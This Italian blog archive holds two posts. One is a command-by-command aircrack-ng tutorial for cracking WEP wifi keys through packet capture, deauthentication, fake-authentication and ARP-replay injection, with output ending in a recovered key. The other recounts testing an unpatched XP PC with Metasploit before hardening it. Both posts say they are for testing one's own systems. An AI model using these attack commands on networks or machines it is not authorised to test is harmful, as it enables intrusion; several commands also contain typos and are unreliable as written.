logo

Tag Archive for protezione

Aricrack ng

 

Aricrack ng

Questa guida è solo a scopo dimostrativo: se volete fare il cracking di una rete wifi protetta fatelo sulla vostra in quanto la legge vieta espressamente la forzatura di sistemi altrui, comprese le reti.

Le informazioni di seguito riportate sono prese da “http://www.aircrack-ng.org/doku.php” e testate su SUSE 10.1 e Knoppix 5.0.1 utilizzando un Asus Centrino, un Macbook 2.16 ed un modem Alice gate2 Plus Wi-Fi.

Introduzione

Aircrack è una suite composta da diversi tools:

“Airodump” per la cattura di pacchetti 802.11 (sniffer)

“Aireplay” per il packet injection

“Aircrack” per il cracking di chiavi WEP e WPA-PSK

“Airdecap” decifra file catturati WEP/WPA

Nozioni di Base

I partecipanti:

Access Point (AP) : è l’access point di cui vogliamo conoscere la chiave

Target Client (TC) : è il computer che dialoga con l’access point.

Sniffing Client (SC) : è il computer che si occuperà di sniffare il traffico della rete (passive mode).

Attacking Client (AC) : è un client che si occuperà di stimolare la generazione di idonei pacchetti (IVs) (active mode)

Installazione

Per prima cosa installiamo aircrack

apriamo una shell e da amministratori digitiamo:

Make

Make install

e lavoriamo nella relativa cartella.

Configurazione

Digitiamo

iwconfig

e vediamo quale interfaccia stiamo usando (nel mio caso eth2).

Avviamo Airmon-ng:

airmon-ng <start|stop> <interface> [channel]

dove

·<start|stop> avvia o ferma l’interfaccia

·<interface> specifica l’interfaccia (eth0, wifi0, wlan0)

·[channel] indica il canale (opzionale)


esempio:

arimon-ng start eth2

otteniamo per il mio Asus:

Interface Chipset Driver

eth2 Centrino 2 ipw2200 (monitor mode enable)

Scansione

Lanciamo da terminale il seguente comando per abilitare la modalità monitor della scheda wireless:

iwconfig eth2 mode monitor

poi avviamo lo sniffer:

airodump-ng <options> <interfaccia>

dove:

Options:

–ivs: Save only captured IVs. Short form -i.

–gpsd: Use GPSd.Short forum -g.

–write<prefix> : Dump file prefix.Short form -w.

–beacons: Record all beacons in dump file. Short form -e.

–netmask <netmask> : Filter APs by mask. Short form -m.

–bssid<bssid> : Filter APs by BSSID.Short form -d.

–encrypt<suite> : Filter APs by cypher suite.Short form -t

-a: Filter unassociated clients

Appare ad esempio:

CH9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WEP handshake: 00:19::3E:48:52:B5

BSSIDPWR RXQBeacons#Data, #/sCHMBENCCIPHER AUTH ESSID

00:19::3E:48:52:B532 100752732954 WEP WEP Alice

BSSIDSTATIONPWRLostPacketsProbes

00:19:3E:48:52:B500:0F:B5:FD:FB:C235099 Alice

Otteniamo le seguenti informazioni:

·BSSID dell’AP (indirizzo MAC)

 

·ESSID dell’AP (nome della rete)

 

·Channel (canale)

ed il tipo di chiave, nel nostro caso WEP.

Sniffing

Ora fermiamo arodump (ctrl +C) e lanciamo nuovamente airodump-ng con questi paramentri:

airodump-ng -c <canale> -w <file.cap> <interfaccia>

esempio

“airodump-ng -c 1 -b 00:19:3E:48:52:B5 -w test eth2”

 

In questo limitiamo la ricerca al solo canale interessato e salviamo le informazioni catturate su un file “test”. Per il crack di una rete abbiamo bisogno dai 50.000 a 1.000.000 ivs circa per una chiave Wep a 128-bit, ci vorrebbero forse mesi, allora dobbiamo stimolare la produzione di IVs con vari tipi di attacco!

I tipi di attacco

·Attack 0: Deauthentication

·Attack 1: Fake authentication

·Attack 2: Interactive packet replay

·Attack 3: ARP request replay attack

·Attack 4: KoreK chopchop attack

·Attack 5: Fragmentation attack

·Attack 9: Injection test

Importante

Non tutte le schede Wireless hanno drivers che consentono l’injection.

Airplay-ng supporta l’injection solo su schede Prism2, PrismGT. Atheros, RTL8180/8187, Ralink, Zydas

nel mio caso la scheda interna è del tipo “ipw2200”, pertanto cerco l’ultimo pacht/driver disponibile.

Recupero i driver e li installo:

wget http://superb-west.dl.sourceforge.net/sourceforge/

ieee80211/ieee80211-1.2.17.tar.gz

tar zxvf ieee80211-1.2.17.tar.gz

cd ieee80211-1.2.17

make

make install

modprobe ipw2200 rtap_iface=1

ifconfig rtap0 up

fconfig eth2 up

(i driver ipw2200 per jniect funzionano solo per attacchi 2 e 4 , forse il 3, certamente chi possiede un centrino con la scheda ipw3945 può effettuare l’ jniection installando:

wget http://homepages.tu-darmstadt.de/~p_larbig/
wlan/ipwraw-ng-2.0.0-10072007.tar.bz2
tar -xjf ipwraw-ng*

…install….eccc…

sudo modprobe -r ipw3945sudo modprobe ipwraw
)

Esempi di attacco:

0. Deauthentication

aireplay-ng -0 1 -a 00:19:3E:48:52:B5 -c 00:1B:63:08:B6:40 eth2

1. Fake authentication

aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <MAC TC> <interfaccia>

aireplay-ng -1 6000 -o 1 -q 10 -e Alice -a 00:19:3E:48:52:B5 -h 00:1B:63:08:B6:40 eth2

altro esempio:

“aireplay-ng -1 0 -e Alice-xxxxx -a 00:19:3e:48:52:b5 -h 00:1b:63:08:b6:40 eth2”

 

dove:

·-1 = fake authentication

       ·-o  il ritardo (valore >=0)

·-e “Alice-xxxxx” è il nome del network

·-a 00:19:3e:48:52:b5 è l’ind. MAC dell’AP

·-h 00:1b:63:08:b6:40 è l’ind. MAC del TC

·eth2 è il nome dell’interfaccia

2. Interactive packet replay

aireplay-ng -2 -b 00:19:3E:48:52:B5 -d FF:FF:FF:FF:FF:FF -t 1 eth2

3. ARP Request Replay Attack

aireplay-ng -3 -b <BSSID> – h <AP client> <interface>

aireplay-ng -3 -b <BSSID> – d <MAC di destinazione (falso)> -h <MAC TC> <interface>

aireplay-ng -3 -b 00:19:3E:48:52:B5 -h 00:1B:63:08:B6:40 eth2

4. KoreK chopchop

aireplay-ng -4 -b 00:19:3E:48:52:B5 -h 00:1B:63:08:B6:40 eth2

5. Fragmentation Attack

aireplay-ng -5 -b 00:19:3E:48:52:B5 -h 00:1B:63:08:B6:40 eth2

6. Injection test

aireplay-ng –test <interfaccia>

aireplay-ng -9 eth2

aireplay-ng –test -e Alice -a 00:19:3E:48:52:B5 eth2

 

Cracking

Quando siamo pronti (numero di IVs ottimale raggiunto) digitiamo da un’altra shell:

aircrack-ng <options> <file.cap>

o

aircrack-ng -a 1 – b <mac AP> -n XX nomefile.cap

nel nostro caso:

aircrack-ng -n 64 test-01.cap

o

aircrack-ng -a 1 – b 00:19:3e:48:52:b5 -n 64 test.cap

o

aircrack-ng -f 2 – b 00:19:3e:48:52:b5 -n 64 test.cap

tra le opzioni segnalo:

-n : lunghezza della chiave,

– 64 per 40-bit WEP

– 128 per 104-bit WEP

-a : force attack mode (1=static WEP, 2=WPA/WPA2-PSK)

-b : indirizza il targhet network sull’indirizzo MAC dell’access point)

– f: (2 per 104-bit WEP ; 5 per 40-bit WEP)

un pò di pazienza e se i pacchetti IVs sono sufficienti si ottiene la chiave.

Opening ptw-01.cap

Read 171721 packets.

#BSSIDESSIDEncryption

100:19::3E:48:52:B5 Alice-xxxxxWEP (30680 IVs)

Choosing first network as target.

Aircrack-ng 0.7 r247

[00:00:00] Tested 2 keys (got 13 IVs)

KBdepthbyte(vote)

00/000(0) 00(0) 00(0) 00(0) 00(0) 00(0) 00(0) 00(0) 00 ( 0) 00(0)

KEY FOUND! [ 12:34:56:78:90 ]

Probability: 100%

ed il gioco è fatto.

Se la vostra scheda non supporta l’injection, e volete ugualmente testare aircrack potete usare il seguente file:

ptw.cap

relativo ad una chiave a 128-bit WEP, una volta decriptato apparirà il seguente valore:

“1F:1F:1F:1F:1F ”

difatti ricordo che:

WEP – lunghezza chiave Caratteri Ascii Caratteri Hex.

64 bits 5 10

128 bits 13 26

256 bits 29 58

Buon lavoro



La protezione di un PC e l’update

 

Recentemente ho installo ad un amico 4 computer in rete (LAN/Wireless), tre con Windows Vista ed uno con Windows XP SP1. Dovendo adeguare la rete al D.L. 196 era necessario buttare giù un D.P.S. con indicati i mezzi hardware e software a protezione dei dati, nonch’è la valutazione dei rischi.

Per cominciare installo sui tre computer con Windows Vista:

– un programma per cifrare i dati su hard disk (dimensione chiave 256-bit),

– un programma automatico di backup per salvare i dati sia su hard disk che su DVD (protetti da password),

– Antivirus,

– Firewall (configuro le porte limitandole a quelle strettamente necessarie),

– creo più account, uno per amministrare il computer da utilizzare esclusivamente per tale attività ed altri User con accesso limitato,

– e per finire aggiorno il software.

Il computer su cui è installato Windows Xp è naturalmente l’anello debole della catena, o meglio della rete, sul quale installo solo un antivirus del tipo “internet security” All in one .

Volendo testare la sicurezza della rete scelgo naturalmente l’XP come vittima.

Sul MAC trovo un vecchio programmino e decido di provarlo subito, lancio l’applicazione e dopo 20 secondi il computer Vittima si spegne, capisco subito che il suo proprietario non è un appassionato degli aggiornamenti e pertanto continuo nella mia opera.

Avvio con un programma la scansione delle porte e mi segno quelle aperte, poi da questa lista verifico il protocollo ed il protocollo di applicazione tipo:

Porta Protocollo Protocollo di applicazione Nome servizio di sistema
443 TCP HTTPS Servizio Pubblicazione sul Web
443 TCP HTTPS SharePoint Portal Server
443 TCP RPC su HTTPS Exchange Server 2003
445 TCP SMB Servizio fax
445 TCP SMB Spooler di stampa
445 TCP SMB Server

Fatto questo avvio Metasploit ed incomincio a testare i vari Exploit e PAYLOAD sulle porte in ascolto, non tutti gli Exploit funzionano ma alcuni mi consentono di acquisire il totale controllo della macchina.

Verificata la vulnerabilità aggiorno subito il software con SP2, poi ricomincio con l’attacco e riscontro che i bug che Metaploit sfruttava sono stati corretti. Installo un bel firewall robusto ed il computer è pronto.

Metasploit è un programma utile per testare la sicurezza dei computer di qualunque piattaforma (Windows, MAC, Linux ecc…) e va impiegato solo per tale finalità.

Per quanto riguarda la sicurezza ricordo solo alcune cose banali che spesso, per pigrizia o quant’altro, non vengono mai fatte:

– aggiornare il software appena esce un upgrate,

– abilitare ed utilizzare l’account User,

– cifrare i dati (lo so è noioso),

– usare un firewall.

in quanto, quando nei film si vede che un adolescente riesce ad  entrare in un computer in 5 minuti non è una finzione, è la realtà.